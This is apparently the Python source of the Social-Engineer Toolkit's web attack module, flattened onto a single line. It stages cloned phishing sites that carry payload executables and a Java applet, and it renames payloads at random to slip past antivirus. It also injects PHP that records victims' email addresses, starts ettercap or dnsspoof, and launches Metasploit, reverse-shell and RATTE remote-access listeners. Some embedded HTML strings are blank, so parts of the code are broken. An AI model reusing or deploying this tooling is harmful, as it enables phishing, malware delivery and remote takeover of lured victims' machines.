#!/usr/bin/env python import os import sys import re import socket import subprocess from src.core.setcore import * import thread import SocketServer import shutil import re import threading import socket import datetime # see if we are tracking emails track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower() # set current path definepath=os.getcwd() # check os operating_system = check_os() # set default value for automatic listener automatic_listener = "" if operating_system == "posix": try: import pexpect except ImportError: print_error("python-pexpect is not installed.. some things may not work.") return_continue() # specify base msf_path msf_path = "" # see if we are using setshell set_payload = "" if os.path.isfile(setdir + "/set.payload"): fileopen = file(setdir + "/set.payload", "r") for line in fileopen: set_payload = line.rstrip() ################################################################################## # # Start of the SET Web Server for multiattack, java applet, etc. # ################################################################################## def web_server_start(): # define if use apache or not apache=0 # open set_config here apache_check = check_config("APACHE_SERVER=").lower() if apache_check == "on" or track_email == "on": apache_path = check_config("APACHE_DIRECTORY=") apache = 1 if operating_system == "windows": apache = 0 # specify the web port web_port = check_config("WEB_PORT=") # see if exploit requires webdav if os.path.isfile(setdir + "/meta_config"): fileopen=file(setdir + "/meta_config", "r") for line in fileopen: line=line.rstrip() match=re.search("set SRVPORT 80", line) if match: match2=re.search("set SRVPORT 8080", line) if not match2: web_port=8080 # check ip address if check_options("IPADDR=") != 0: ipaddr = check_options("IPADDR=") else: ipaddr = raw_input("Enter your ipaddress: ") # Grab custom or set defined if os.path.isfile(setdir + "/site.template"): fileopen=file(setdir + "/site.template","r").readlines() for line in fileopen: line=line.rstrip() match=re.search("TEMPLATE=", line) if match: line=line.split("=") template=line[1] # grab web attack selection if os.path.isfile(setdir + "/attack_vector"): fileopen=file(setdir + "/attack_vector","r").readlines() for line in fileopen: attack_vector=line.rstrip() # if it doesn't exist just set a default template if not os.path.isfile(setdir + "/attack_vector"): attack_vector = "nada" # Sticking it to A/V below import string,random def random_string(minlength=6,maxlength=15): length=random.randint(minlength,maxlength) letters=string.ascii_letters+string.digits return ''.join([random.choice(letters) for _ in range(length)]) rand_gen=random_string() # check multiattack flags here multiattack_harv = "off" if os.path.isfile(setdir + "/multi_harvester"): multiattack_harv = "on" if os.path.isfile(setdir + "/multi_tabnabbing"): multiattack_harv = "on" # open our config file that was specified in SET if os.path.isfile(setdir + "/site.template"): fileopen=file(setdir + "/site.template", "r").readlines() # start loop here for line in fileopen: line=line.rstrip() # look for config file and parse for URL match=re.search("URL=",line) if match: line=line.split("=") # define url to clone here url=line[1].rstrip() # if we didn't create template then do self if not os.path.isfile(setdir + "/site.template"): template = "SELF" # If SET is setting up the website for you, get the website ready for delivery if template == "SET": # change to that directory os.chdir("src/html/") # remove stale index.html files if os.path.isfile("index.html"): os.remove("index.html") # define files and get ipaddress set in index.html fileopen=file("index.template", "r").readlines() filewrite=file("index.html", "w") if attack_vector == "java": for line in fileopen: match1=re.search("msf.exe", line) if match1: line=line.replace("msf.exe", rand_gen) match=re.search("ipaddrhere", line) if match: line=line.replace("ipaddrhere", ipaddr) filewrite.write(line) # move random generated name filewrite.close() shutil.copyfile("msf.exe", rand_gen) # define browser attack vector here if attack_vector == "browser": counter=0 for line in fileopen: counter=0 match=re.search("Signed_Update.jar", line) if match: line=line.replace("Signed_Update.jar", "invalid.jar") filewrite.write(line) counter=1 match2=re.search("", line) if match2: if web_port != 8080: line=line.replace("", '' % (ipaddr)) filewrite.write(line) counter=1 if web_port == 8080: line=line.replace("", '' % (ipaddr)) filewrite.write(line) counter=1 if counter == 0: filewrite.write(line) filewrite.close() if template == "CUSTOM" or template == "SELF": # Bring our files to our directory if attack_vector != 'hid': if attack_vector != 'hijacking': print bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC # copy all the files needed if not os.path.isfile(setdir + "/Signed_Update.jar"): shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % (definepath), "%s/Signed_Update.jar" % (setdir)) shutil.copyfile(setdir + "/Signed_Update.jar", "%s/web_clone/Signed_Update.jar" % (setdir)) if os.path.isfile("%s/src/html/nix.bin" % (definepath)): nix = check_options("NIX.BIN=") shutil.copyfile("%s/src/html/nix.bin" % (definepath), "%s/web_clone/%s" % (setdir, nix)) if os.path.isfile("%s/src/html/mac.bin" % (definepath)): mac = check_options("MAC.BIN=") shutil.copyfile("%s/src/html/mac.bin" % (definepath), "%s/web_clone/%s" % (setdir, definepath, mac)) if os.path.isfile(setdir + "/msf.exe"): win = check_options("MSF.EXE=") shutil.copyfile(setdir + "/msf.exe" , "%s/web_clone/%s" % (setdir,win)) # pull random name generation print_status("The site has been moved. SET Web Server is now listening..") rand_gen = check_options("MSF_EXE=") if rand_gen != 0: if os.path.isfile(setdir + "/custom.exe"): shutil.copyfile(setdir + "/msf.exe", setdir + "/web_clone/msf.exe") print "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now" shutil.copyfile(setdir + "/web_clone/msf.exe", setdir + "/web_clone/%s" % (rand_gen)) # if docbase exploit do some funky stuff to get it to work right if os.path.isfile(setdir + "/docbase.file"): docbase=(r""" """ % (ipaddr)) if os.path.isfile(setdir + "/web_clone/site.html"): os.remove(setdir + "/web_clone/site.html") shutil.copyfile(setdir + "/web_clone/index.html", setdir + "/web_clone/site.html") filewrite=file(setdir + "/web_clone/index.html", "w") filewrite.write(docbase) filewrite.close() #################################################################################################################################### # # START WEB SERVER STUFF HERE # #################################################################################################################################### if apache == 0: if multiattack_harv == 'off': try: # specify port listener here import src.core.webserver as webserver # specify the path for the SET web directories for the applet attack path = (setdir + "/web_clone/") try: import multiprocessing p = multiprocessing.Process(target=webserver.start_server, args=(web_port,path)) p.start() except Exception: import thread thread.start_new_thread(webserver.start_server, (web_port,path)) # Handle KeyboardInterrupt except KeyboardInterrupt: exit_set() # Handle Exceptions except Exception,e: print e log(e) print bcolors.RED + "[!] ERROR: You probably have something running on port 80 already, Apache??" print "[!] There was an issue, printing error: " +str(e) + bcolors.ENDC print bcolors.ENDC + "Do you want to try to stop Apache? y/n" stop_apache = raw_input("Attempt to stop Apache? y/n: ") if stop_apache == "yes" or stop_apache == "y" or stop_apache == "": subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait() try: # specify port listener here import src.core.webserver as webserver # specify the path for the SET web directories for the applet attack path = (setdir + "/web_clone/") p = multiprocessing.Process(target=webserver.start_server, args=(web_port,path)) p.start() except Exception: print bcolors.RED + "[!] UNABLE TO STOP APACHE! Exiting..." + bcolors.ENDC sys.exit() # if we are custom, put a pause here to not terminate thread on web server if template == "CUSTOM" or template == "SELF": custom_exe = check_options("CUSTOM_EXE=") if custom_exe != 0: while 1: # try block inside of loop, if control-c detected, then exit try: print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!") pause = raw_input(bcolors.GREEN + "\n[*] Web Server is listening. Press Control-C to exit." + bcolors.ENDC) # handle keyboard interrupt except KeyboardInterrupt: print bcolors.GREEN + "[*] Returning to main menu." + bcolors.ENDC break if apache == 1: subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/Signed* %s 1> /dev/null 2> /dev/null" % (definepath,apache_path,definepath,apache_path,setdir,apache_path,setdir,apache_path,setdir,apache_path), shell=True).wait() # if we are tracking users if track_email == "on": now=datetime.datetime.today() filewrite = file("%s/harvester_%s.txt" % (apache_path,now), "w") filewrite.write("") filewrite.close() subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (apache_path,now), shell=True).wait() # here we specify if we are tracking users and such fileopen = file ("%s/index.html" % (apache_path), "r") data = fileopen.read() data = data.replace("", """ $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now)) filewrite = file("%s/index.php" % (apache_path), "w") filewrite.write(data) filewrite.close() print_status("All files have been copied to %s" % (apache_path)) ##################################################################################################################################### # # END WEB SERVER STUFF HERE # ##################################################################################################################################### if operating_system != "windows": # Grab metaspoit path msf_path=meta_path() import pexpect # define if use apache or not apache=0 # open set_config here apache_check = check_config("APACHE_SERVER=").lower() if apache_check == "on" or track_email == "on": apache_path = check_config("APACHE_DIRECTORY=") apache = 1 if operating_system == "windows": apache = 0 web_server = check_config("WEB_PORT=") # setup multi attack options here multiattack="off" if os.path.isfile(setdir + "/multi_tabnabbing"): multiattack="on" if os.path.isfile(setdir + "/multi_harvester"): multiattack="on" # Grab custom or set defined template = "" if os.path.isfile(setdir + "/site.template"): fileopen=file(setdir + "/site.template","r").readlines() for line in fileopen: line=line.rstrip() match=re.search("TEMPLATE=", line) if match: line=line.split("=") template=line[1] # Test to see if something is running on port 80, if so throw error try: web_port = check_config("WEB_PORT=") web_port=int(web_port) ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM) ipaddr.connect(('127.0.0.1', web_port)) ipaddr.settimeout(2) if ipaddr: # if apache isnt running and something is on 80, throw error if apache== 0: print_error("ERROR:Something is running on port %s. Seeing if it's a stale SET process..." % (web_port)) # if we are running windows then flag error (probably IIS or tomcat or something like that) if operating_system == "nt": exit_set() # if we are running posix then check to see what the process is first if operating_system == "posix": proc=subprocess.Popen("netstat -antp |grep LISTEN |grep '%s'" % (web_port), shell=True, stdout=subprocess.PIPE) stdout_value=proc.communicate()[0] a=re.search("\d+/python", stdout_value) if a: b=a.group() b=b.replace("/python","") print_status("Stale process identified, attempting to kill process %s...." % str(b)) subprocess.Popen("kill -9 %s" % (b), shell=True).wait() ipaddr.connect(('localhost', web_port)) if ipaddr: print_error("Sorry hoss, couldn't kill it, check whats running on 80 and restart SET!") exit_set() if not ipaddr: print_status("Success, the stale process has been terminated and SET is running normally...") else: # if we detect an apache installation if os.path.isfile("/etc/init.d/apache2"): apache_stop = raw_input("[!] Apache may be running, do you want SET to stop the process? [y/n]: ") if apache_stop.lower() == "y" or apache_stop.lower() == "yes": print_status("Attempting to stop apache.. One moment..") # stop apache here subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait() try: ipaddr.connect(('localhost', web_port)) if ipaddr: print_warning("If you want to use Apache, edit the config/set_config") print_error("Exit whatever is listening and restart SET") exit_set() # if it couldn't connect to localhost, we are good to go and continue forward except Exception: print_status("Success! Apache was stopped. Moving forward within SET...") # if we don't want to stop apache then exit SET and flag user if apache_stop.lower() == "n" or apache_stop.lower() == "no": print_warning("If you want to use Apache, edit the config/set_config and turn apache on") print_error("Exit whatever is lsitening or turn Apache on in set_config and restart SET") exit_set() else: print_warning("If you want to use Apache, edit the config/set_config") print_error("Exit whatever is listening and restart SET") exit_set() # if apache is set to run let the user know we are good to go if operating_system == "posix": if apache == 1: proc=subprocess.Popen("netstat -antp |grep LISTEN |grep '%s'" % (web_port), shell=True, stdout=subprocess.PIPE) stdout_value=proc.communicate()[0] a=re.search("\d+/apache2", stdout_value) if a: print_status("Apache appears to be running, moving files into Apache's home") else: print_error("Exit whatever is listening and restart SET") exit_set() # except all issues and throw out to here except Exception, e: # if we are using apache if apache == 1: print_error("Error:Apache does not appear to be running.") print_error("Start it or turn APACHE off in config/set_config") print_status("Attempting to start Apache manually...") apache_counter = 0 if os.path.isfile("/etc/init.d/apache2"): subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait() apache_counter = 1 if os.path.isfile("/etc/init.d/httpd"): subprocess.Popen("/etc/init.d/httpd start", shell=True).wait() apache_counter = 1 if apache_counter == 0: print_error("ERROR: Unable to start Apache through SET,") print_error("ERROR: Please turn Apache off in the set_config or turn it on manually!") print_error("Exiting the Social-Engineer Toolkit...") exit_set() # except KeyboardInterrupt except KeyboardInterrupt: print_warning("KeyboardInterrupt detected, bombing out to the prior menu.") # grab metasploit root directory if operating_system == "posix": msf_path=meta_path() # Launch SET web attack and MSF Listener try: if multiattack == "off": print (bcolors.BLUE + "\n***************************************************") print (bcolors.YELLOW + "Web Server Launched. Welcome to the SET Web Attack.") print (bcolors.BLUE + "***************************************************") print (bcolors.PURPLE+ "\n[--] Tested on Windows, Linux, and OSX [--]" + bcolors.ENDC) if apache == 1: print (bcolors.GREEN+ "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC) if os.path.isfile(setdir + "/meta_config"): fileopen=file(setdir + "/meta_config", "r") for line in fileopen: line=line.rstrip() match=re.search("set SRVPORT 80", line) if match: match2=re.search("set SRVPORT 8080", line) if not match2: if apache == 1: print_warning("Apache appears to be configured in the SET (set_config)") print_warning("You will need to disable Apache and re-run SET since Metasploit requires port 80 for WebDav") exit_set() print bcolors.RED + """Since the exploit picked requires port 80 for WebDav, the\nSET HTTP Server port has been changed to 8080. You will need\nto coax someone to your IP Address on 8080, for example\nyou need it to be http://172.16.32.50:8080 instead of standard\nhttp (80) traffic.""" web_server_start() # if we are using ettercap if os.path.isfile(setdir + "/ettercap"): fileopen5=file(setdir + "/ettercap", "r") for line in fileopen5: ettercap=line.rstrip() # run in background ettercap=ettercap+" &" # spawn ettercap or dsniff subprocess.Popen(ettercap, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) # if metasploit config is in directory if os.path.isfile(setdir + "/meta_config"): print_info("Launching MSF Listener...") print_info("This may take a few to load MSF...") # this checks to see if we want to start a listener automatic_listener = check_config("AUTOMATIC_LISTENER=").lower() if automatic_listener != "off": try: reload(pexpect) except: import pexpect # specify if we are using the multi pyinjector meta_config = "meta_config" if os.path.isfile(setdir + "/meta_config_multipyinjector"): meta_config = "meta_config_multipyinjector" child1=pexpect.spawn("ruby %s/msfconsole -L -n -r %s/%s" % (msf_path,setdir,meta_config)) # check if we want to deliver emails or track users that click the link webattack_email = check_config("WEBATTACK_EMAIL=").lower() if webattack_email == "on" or track_email == "on": try: reload(src.phishing.smtp.client.smtp_web) except: import src.phishing.smtp.client.smtp_web child1.interact() if os.path.isfile(setdir + "/set.payload"): port = check_options("PORT=") # grab configuration fileopen=file(setdir + "/set.payload", "r") for line in fileopen: set_payload = line.rstrip() if set_payload == "SETSHELL": print "\n" print_info("Launching the SET Interactive Shell...") try: reload(src.payloads.set_payloads.listener) except: import src.payloads.set_payloads.listener if set_payload == "SETSHELL_HTTP": print "\n" print_info("Launching the SET HTTP Reverse Shell Listener...") try: reload(src.payloads.set_payloads.set_http_server) except: import src.payloads.set_payloads.set_http_server if set_payload == "RATTE": print_info("Launching the Remote Administration Tool Tommy Edition (RATTE) Payload...") # prep ratte if its posix if operating_system == "posix": subprocess.Popen("chmod +x src/payloads/ratte/ratteserver", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) os.system("src/payloads/ratte/ratteserver %s" % (port)) # if not then run it in windows if operating_system == "windows": if not os.path.isfile(setdir + "/ratteserver.exe"): shutil.copyfile("../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe") shutil.copyfile("../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll") os.system(setdir + "/ratteserver %s" % (definepath,port)) # handle errors except Exception, e: log(e) pass try: if apache == 1: raw_input(bcolors.ENDC +"\nPress [return] when finished.") child.close() child1.close() # close ettercap thread, need to launch from here eventually instead of executing # an underlying system command. if operating_system == "posix": subprocess.Popen("pkill ettercap 1> /dev/null 2> /dev/null", shell=True).wait() # kill dnsspoof if there subprocess.Popen("pkill dnsspoof 1> /dev/null 2> /dev/null", shell=True).wait() if apache == 1: subprocess.Popen("rm %s/index.html 1> /dev/null 2> /dev/null;rm %s/Signed* 1> /dev/null 2> /dev/null;rm %s/*.exe 1> /dev/null 2> /dev/null" % (apache_path,apache_path,apache_path), shell=True).wait() except: try: child.close() except: pass except KeyboardInterrupt: sys.exit(1) # if we turned automatic listener off if automatic_listener == "off" or multiattack== "on": if automatic_listener == "off": print_warning("Listener is turned off in config/set_config!") if automatic_listener == "off" or template == "CUSTOM" or template == "SELF": while 1: try: print_warning("\n If you used custom imports, ensure you create YOUR OWN LISTENER!\nSET does not know what custom payload you used.") pause = raw_input("\nPress {control -c} to return to the main menu when you are finished.") except KeyboardInterrupt: break if apache == 1: # if we are running apache then prompt to exit this menu print_status("Everything has been moved over to Apache and is ready to go.") return_continue() # we stop the python web server when we are all finished if apache == 0: # specify the web port web_port = check_config("WEB_PORT=") # stop the web server try: import src.core.webserver as webserver except: reload(src.core.webserver) webserver.stop_server(web_port) # call the cleanup routine cleanup = check_config("CLEANUP_ENABLED_DEBUG=") if cleanup.lower() != "on": cleanup_routine()